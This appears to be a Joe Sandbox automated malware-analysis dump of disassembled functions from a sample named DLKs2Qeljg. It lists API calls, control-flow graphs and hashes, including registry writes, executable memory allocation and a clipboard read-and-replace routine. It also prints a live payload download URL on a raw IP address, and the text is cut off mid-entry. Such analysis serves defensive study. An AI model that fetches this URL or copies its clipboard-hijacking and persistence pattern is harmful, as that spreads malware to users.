                                                                                                        • API String ID: 2059591211-0
                                                                                                        • Opcode ID: 7b268af305ad7e70588f0d2166d3aa4120e27ad18746cc38b88b58263b6b4356
                                                                                                        • Instruction ID: aebd2ac95218272d728fe4b8aabd0d06745c53d3a4d3bf2acc4ab23466c53149
                                                                                                        • Opcode Fuzzy Hash: 7b268af305ad7e70588f0d2166d3aa4120e27ad18746cc38b88b58263b6b4356
                                                                                                        • Instruction Fuzzy Hash: 5FF082324007009BE7313772C80770A77A0AF04319F54883EF456769E2DBBEA8585A5D

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 415 402956-4029c1 call 426820 call 42a33b call 42b444 call 402819 424 4029c3-4029c6 415->424 425 4029cf-4029e9 call 404329 call 40f8c5 415->425 424->425 426 4029c8-4029cc 424->426 426->425 428 4029ce 426->428 428->425
                                                                                                        APIs
                                                                                                        • _wcslen.LIBCMT ref: 00402985
                                                                                                        • __fassign.LIBCMT ref: 00402995
                                                                                                          • Part of subcall function 00402819: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004028FC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
                                                                                                        • String ID: +@
                                                                                                        • API String ID: 2843524283-4068139069
                                                                                                        • Opcode ID: c4372d71d1af2a683dbfcdd1665cb533e7f75167211033e386056ce4ddc1eda8
                                                                                                        • Instruction ID: 360ce0a8eae9c999d09f2756f3db8bce049cda3fb2da0c45bd643548fbd10a56
                                                                                                        • Opcode Fuzzy Hash: c4372d71d1af2a683dbfcdd1665cb533e7f75167211033e386056ce4ddc1eda8
                                                                                                        • Instruction Fuzzy Hash: F901D6B1E0011C5ADB24EA25ED46AEF77689B41308F1401BBA605E31C1D9785E45CA99

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(00457910,00000010,00000003,00431F4D), ref: 0042DFC3
                                                                                                        • ExitThread.KERNEL32 ref: 0042DFCA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorExitLastThread
                                                                                                        • String ID: <(@
                                                                                                        • API String ID: 1611280651-4189137628
                                                                                                        • Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                                                                        • Instruction ID: e0787552ab8efb8db6d324a59155cd7370fffab00d3424d568e81b2c5b813918
                                                                                                        • Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                                                                        • Instruction Fuzzy Hash: 7EF0A471A00614AFDB04EFB1D80AA6D3B70FF09715F10056AF40257292CB7969558B68

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 452 42e104-42e10f 453 42e111-42e123 call 42eab9 call 42a58d 452->453 454 42e125-42e138 call 42e0bb 452->454 469 42e175-42e178 453->469 460 42e166 454->460 461 42e13a-42e157 CreateThread 454->461 465 42e168-42e174 call 42e02d 460->465 463 42e179-42e17e 461->463 464 42e159-42e165 GetLastError call 42ea83 461->464 467 42e180-42e183 463->467 468 42e185-42e187 463->468 464->460 465->469 467->468 468->465
                                                                                                        APIs
                                                                                                        • CreateThread.KERNEL32(?,?,Function_0002DFB0,00000000,?,?), ref: 0042E14D
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,0040CF04,00000000,00000000,?,?,00000000,?), ref: 0042E159
                                                                                                        • __dosmaperr.LIBCMT ref: 0042E160
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateErrorLastThread__dosmaperr
                                                                                                        • String ID:
                                                                                                        • API String ID: 2744730728-0
                                                                                                        • Opcode ID: 7111d36ae7d9c15de437581cc3a8b466686a4c726987840fc25d61e653133f3e
                                                                                                        • Instruction ID: 0446f91cba5bc1877a5460ce95bae766c471c3d01d015a917539d7ef00797947
                                                                                                        • Opcode Fuzzy Hash: 7111d36ae7d9c15de437581cc3a8b466686a4c726987840fc25d61e653133f3e
                                                                                                        • Instruction Fuzzy Hash: FF01D236600139BBDB119FA3FC05AAF7B6AEF85720F40003AF80582210DB358D21C7A9

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 473 434745-43475d call 439911 476 434770-434786 SetFilePointerEx 473->476 477 43475f-434764 call 42eab9 473->477 478 434797-4347a1 476->478 479 434788-434795 GetLastError call 42ea83 476->479 483 43476a-43476e 477->483 482 4347a3-4347b8 478->482 478->483 479->483 486 4347bd-4347c2 482->486 483->486
                                                                                                        APIs
                                                                                                        • SetFilePointerEx.KERNEL32(00000000,00000000,0040DDCB,00000000,00000002,0040DDCB,00000000,?,?,?,004347F4,00000000,00000000,0040DDCB,00000002), ref: 0043477E
                                                                                                        • GetLastError.KERNEL32(?,004347F4,00000000,00000000,0040DDCB,00000002,?,0042C151,?,00000000,00000000,00000001,?,0040DDCB,?,0042C206), ref: 00434788
                                                                                                        • __dosmaperr.LIBCMT ref: 0043478F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                        • String ID:
                                                                                                        • API String ID: 2336955059-0
                                                                                                        • Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                                                                        • Instruction ID: 754c6ade6be4612c7e0c4d55d151f31ddb378772f23eed9c1438f533fa7de6e2
                                                                                                        • Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                                                                        • Instruction Fuzzy Hash: 92012836710114ABDB159FAADC058EE7B2AEFCA721F24020AF81597290EB74ED528794

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 487 402ba3-402bcf RegCreateKeyExW 488 402bd1-402be3 RegSetValueExW 487->488 489 402be5-402be8 487->489 488->489 490 402bf3-402bf9 489->490 491 402bea-402bed RegCloseKey 489->491 491->490
                                                                                                        APIs
                                                                                                        • RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BC5
                                                                                                        • RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BDD
                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BED
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseCreateValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 1818849710-0
                                                                                                        • Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                                                                        • Instruction ID: 504cdbf1e8d79b6d7283afc99896261950e1a919ac783b79018d19fe3f3d7e53
                                                                                                        • Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                                                                        • Instruction Fuzzy Hash: 16F0B4B650011CFFEB214F94DD89DABBA7CEB047E9F100175FA01B2150D6B19E009664

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 492 42e064-42e071 call 431f4e 495 42e073-42e076 ExitThread 492->495 496 42e07c-42e084 492->496 496->495 497 42e086-42e08a 496->497 498 42e091-42e097 497->498 499 42e08c call 4354e6 497->499 501 42e0a4-42e0aa 498->501 502 42e099-42e09b 498->502 499->498 501->495 504 42e0ac-42e0ae 501->504 502->501 503 42e09d-42e09e CloseHandle 502->503 503->501 504->495 505 42e0b0-42e0ba FreeLibraryAndExitThread 504->505
                                                                                                        APIs
                                                                                                          • Part of subcall function 00431F4E: GetLastError.KERNEL32(?,?,?,0042EABE,00434D6C,?,00431EF8,00000001,00000364,?,0042DFD5,00457910,00000010), ref: 00431F53
                                                                                                          • Part of subcall function 00431F4E: _free.LIBCMT ref: 00431F88
                                                                                                          • Part of subcall function 00431F4E: SetLastError.KERNEL32(00000000), ref: 00431FBC
                                                                                                        • ExitThread.KERNEL32 ref: 0042E076
                                                                                                        • CloseHandle.KERNEL32(?,?,?,0042E196,?,?,0042E00D,00000000), ref: 0042E09E
                                                                                                        • FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E196,?,?,0042E00D,00000000), ref: 0042E0B4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 1198197534-0
                                                                                                        • Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                                                                        • Instruction ID: fd9bad38e730a393213bf68ec19d44fd98ecce05ba50bc9e79acb20fd3a4735a
                                                                                                        • Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                                                                        • Instruction Fuzzy Hash: 8CF05E342006347BEB319F37EC08A5B7A98AF05725F584756B924C22A1DBBCDD82869C

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 506 402394-4023a2 507 402557-402559 PostQuitMessage 506->507 508 4023a8-4023ad 506->508 511 40255f-402564 507->511 509 4023c6-4023cd 508->509 510 4023af-4023c1 DefWindowProcW 508->510 512 4023d4-4023db 509->512 513 4023cf call 401d9a 509->513 510->511 512->511 515 4023e1-402555 call 4010ba call 4029ea 512->515 513->512 515->511
                                                                                                        APIs
                                                                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 004023BB
                                                                                                        • PostQuitMessage.USER32(00000000), ref: 00402559
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessagePostProcQuitWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 3873111417-0
                                                                                                        • Opcode ID: d57fbe59a329fb309be7fe1269fcb85092641ffb4e542ab0082b7c0a7099a69f
                                                                                                        • Instruction ID: bf68dd1ed3332b821989bb5fb7b10a9ee1776f212d734df2d08f0bb157d40bf1
                                                                                                        • Opcode Fuzzy Hash: d57fbe59a329fb309be7fe1269fcb85092641ffb4e542ab0082b7c0a7099a69f
                                                                                                        • Instruction Fuzzy Hash: 1A412D11A64380A5E630FFA5BC55B2533B0FF54712F10653BE524DB2B6E3B28544C75E
                                                                                                        APIs
                                                                                                        • Sleep.KERNEL32(00001562), ref: 00401562
                                                                                                          • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                                                                          • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _wcslen$Sleep
                                                                                                        • String ID: http://176.113.115.19/ScreenUpdateSync.exe
                                                                                                        • API String ID: 3358372957-3120454669
                                                                                                        • Opcode ID: 7701b78b2553ec30eafcf5b5a8124595c597b4782acb6499a108b1673ff50c75
                                                                                                        • Instruction ID: 7c00d7bba67f06605ca45885bb35db497ce8a02c3eee20c143d632ed8421155e
                                                                                                        • Opcode Fuzzy Hash: 7701b78b2553ec30eafcf5b5a8124595c597b4782acb6499a108b1673ff50c75
                                                                                                        • Instruction Fuzzy Hash: 49317955A6538094E330DFA0BC56B252370FF64B52F50653BD60CCB2B2E7A18587C75E
                                                                                                        APIs
                                                                                                        • SetErrorMode.KERNEL32(00000400,?,?,02120223,?,?), ref: 02120E19
                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,02120223,?,?), ref: 02120E1E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorMode
                                                                                                        • String ID:
                                                                                                        • API String ID: 2340568224-0
                                                                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                        • Instruction ID: 44aadaba4ceec3c7039f90236b980d150b62195d6aed535f06090d2979b601d5
                                                                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                        • Instruction Fuzzy Hash: 68D012311451287BD7002A94DC09BCD7B1CDF09B66F108011FB0DD9080C770954046E5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                                                                        • Instruction ID: bbb5b7410918ed3a19f08aeefc1504024edbbdc2131895f71ed4605d11f41fec
                                                                                                        • Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                                                                        • Instruction Fuzzy Hash: EB51E971A00214AFDB10DF59C844BEA7BA1EFC9364F19929AF8099B391C735FD42CB94
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __fread_nolock
                                                                                                        • String ID:
                                                                                                        • API String ID: 2638373210-0
                                                                                                        • Opcode ID: a181b7be805d7fa44ac39242885525ea8222ab64a8fcafdecb561f0e5ce962c8
                                                                                                        • Instruction ID: 4d174249788eeb6afcd1119ee109bea02bf0543b951493d32b1ba631c5db93a5
                                                                                                        • Opcode Fuzzy Hash: a181b7be805d7fa44ac39242885525ea8222ab64a8fcafdecb561f0e5ce962c8
                                                                                                        • Instruction Fuzzy Hash: 18319CB1604716AFC710DE2AC88091ABFA8BF84351F04853EFC44A7391D779EA548BCA
                                                                                                        APIs
                                                                                                        • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004028FC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Ios_base_dtorstd::ios_base::_
                                                                                                        • String ID:
                                                                                                        • API String ID: 323602529-0
                                                                                                        • Opcode ID: 72fdb1b190d3a1d2d7d6c29d22f11b53277dfea25eaf381d8fe65a68052a5e16
                                                                                                        • Instruction ID: a96161e1099ed2e4ebc89c8b3bfd47f038f5993eec498a984b7603ffbfb0c6fe
                                                                                                        • Opcode Fuzzy Hash: 72fdb1b190d3a1d2d7d6c29d22f11b53277dfea25eaf381d8fe65a68052a5e16
                                                                                                        • Instruction Fuzzy Hash: C8312BB4D002199BDB14EFA5D881AEDBBB4BF48304F5085AEE415B3281DB786A48CF54
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3_catch
                                                                                                        • String ID:
                                                                                                        • API String ID: 3886170330-0
                                                                                                        • Opcode ID: ccf9f932eb112f7f3215526f30a1f7312533cc0aacad866aa3aa8a24b0442ac4
                                                                                                        • Instruction ID: df22ffae6d2fe3b800e0c8e4f2770173a5e1bd04bbee8454eb0c8e7fe139aa3e
                                                                                                        • Opcode Fuzzy Hash: ccf9f932eb112f7f3215526f30a1f7312533cc0aacad866aa3aa8a24b0442ac4
                                                                                                        • Instruction Fuzzy Hash: C1215B70A00205EFCB15DF55C484EAEBBB5BF88705F14816EE805AB3A1C778AE50DF94
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __wsopen_s
                                                                                                        • String ID:
                                                                                                        • API String ID: 3347428461-0
                                                                                                        • Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                                                                        • Instruction ID: ab2784c25bcc6a383b761dc233afc1089a93ea485bdb2d241c4dcfca41164893
                                                                                                        • Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                                                                        • Instruction Fuzzy Hash: 2511487590420AAFCF05DF58E94199B7BF4FF48314F10406AF808AB311D770EA11CBA9
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free
                                                                                                        • String ID:
                                                                                                        • API String ID: 269201875-0
                                                                                                        • Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                                                                        • Instruction ID: 35ea3ad1aa6a7a88a67b465f5c451a9d93fb5bd3893c922deb476a376b6bfb46
                                                                                                        • Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                                                                        • Instruction Fuzzy Hash: 3EF0BE33810008BBCF115E96DC01DDF3B6EEF8D339F100116F914921A0DB3ACA22ABA4
                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(00000000,0040D866,00000000,?,0042678E,00000002,00000000,00000000,00000000,?,0040CD17,0040D866,00000004,00000000,00000000,00000000), ref: 004336C9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0
                                                                                                        • Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                                                                        • Instruction ID: eec6a97fd20e662809c0c25a02e68f43ccf4a0d84c2e20558320e6cd2c3c69d0
                                                                                                        • Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                                                                        • Instruction Fuzzy Hash: 6CE0E5213006207FDA303F675C06B5B36489F49BBAF142137AC06927D1DB2CEE0085ED
                                                                                                        APIs
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004103B7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throw
                                                                                                        • String ID:
                                                                                                        • API String ID: 2005118841-0
                                                                                                        • Opcode ID: b2a61ea650375c75c53941cf1669b74608d6a6abec66458302ae90db8424a762
                                                                                                        • Instruction ID: 7514a9331385c8c8780a364a21f4f069850cbfc0a8d6a65b648f56ba84841e90
                                                                                                        • Opcode Fuzzy Hash: b2a61ea650375c75c53941cf1669b74608d6a6abec66458302ae90db8424a762
                                                                                                        • Instruction Fuzzy Hash: 75E02B3050020DB3CB147665FC1185D777C5A10318BA04237BC28A14D1DF78E59DC48D
                                                                                                        APIs
                                                                                                        • CreateFileW.KERNEL32(00000000,00000000,?,0043D0D5,?,?,00000000,?,0043D0D5,00000000,0000000C), ref: 0043CD17
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 823142352-0
                                                                                                        • Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                                                                        • Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
                                                                                                        • Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                                                                        • Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95
                                                                                                        APIs
                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 0058A156
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149087882.0000000000589000.00000040.00000020.00020000.00000000.sdmp, Offset: 00589000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_589000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                        • Instruction ID: 680916bc3f36a8c6a07d76f4d75dc59364d576818cc9ba840de564739e63eba8
                                                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                        • Instruction Fuzzy Hash: 98113F79A00208EFDB01DF98C989E98BFF5AF08350F058095F948AB361D371EA50DF91
                                                                                                        APIs
                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 0212194D
                                                                                                        • Sleep.KERNEL32(00001541,0000004C), ref: 02121957
                                                                                                          • Part of subcall function 0212CE6D: _strlen.LIBCMT ref: 0212CE84
                                                                                                        • OpenClipboard.USER32(00000000), ref: 02121984
                                                                                                        • GetClipboardData.USER32(00000001), ref: 02121994
                                                                                                        • _strlen.LIBCMT ref: 021219B0
                                                                                                        • _strlen.LIBCMT ref: 021219DF
                                                                                                        • _strlen.LIBCMT ref: 02121B23
                                                                                                        • EmptyClipboard.USER32 ref: 02121B39
                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 02121B46
                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 02121B70
                                                                                                        • SetClipboardData.USER32(00000001,00000000), ref: 02121B79
                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 02121B80
                                                                                                        • CloseClipboard.USER32 ref: 02121BA4
                                                                                                        • Sleep.KERNEL32(000002D2), ref: 02121BAF
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                                                                        • String ID: 4#E$i
                                                                                                        • API String ID: 4246938166-2480119546
                                                                                                        • Opcode ID: 2174ad36780032491f16a4b006e1811d67a0bbf275fc49b55c7ccd29e86107dc
                                                                                                        • Instruction ID: 3ec820e292007119f11d9c0882e6c1a6defc3951ca584f12c286442733bf5bdb
                                                                                                        • Opcode Fuzzy Hash: 2174ad36780032491f16a4b006e1811d67a0bbf275fc49b55c7ccd29e86107dc
                                                                                                        • Instruction Fuzzy Hash: 9C512530C407A4AED321DFA8DC457BD7B74FF2A306F045225E905A6163EB709A89CB69
                                                                                                        APIs
                                                                                                        • NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 02122392
                                                                                                        • GetClientRect.USER32(?,?), ref: 021223A7
                                                                                                        • GetDC.USER32(?), ref: 021223AE
                                                                                                        • CreateSolidBrush.GDI32(00646464), ref: 021223C1
                                                                                                        • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 021223E0
                                                                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 02122401
                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0212240C
                                                                                                        • MulDiv.KERNEL32(00000008,00000000), ref: 02122415
                                                                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 02122439
                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 021224C4
                                                                                                        • _wcslen.LIBCMT ref: 021224DC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1529870607-0
                                                                                                        • Opcode ID: 0acec2352bfee5fb509a06a029cf7d051f74621778bf16c22ee55e69e02e9778
                                                                                                        • Instruction ID: 7fd3a88b397d1863fac04cfad956eb14478d8ff7a5e6ccf06055bfd6ddd3fd3d
                                                                                                        • Opcode Fuzzy Hash: 0acec2352bfee5fb509a06a029cf7d051f74621778bf16c22ee55e69e02e9778
                                                                                                        • Instruction Fuzzy Hash: 6871EC72900228AFDB229F68DD85FAEBBBCEF09711F0041A5F509E6155DA70AF84CF10
                                                                                                        APIs
                                                                                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BA7D,?,00000000), ref: 0043B7F7
                                                                                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BA7D,?,00000000), ref: 0043B820
                                                                                                        • GetACP.KERNEL32(?,?,0043BA7D,?,00000000), ref: 0043B835
                                                                                                        Strings
                                                                                                        Memory Dump Source
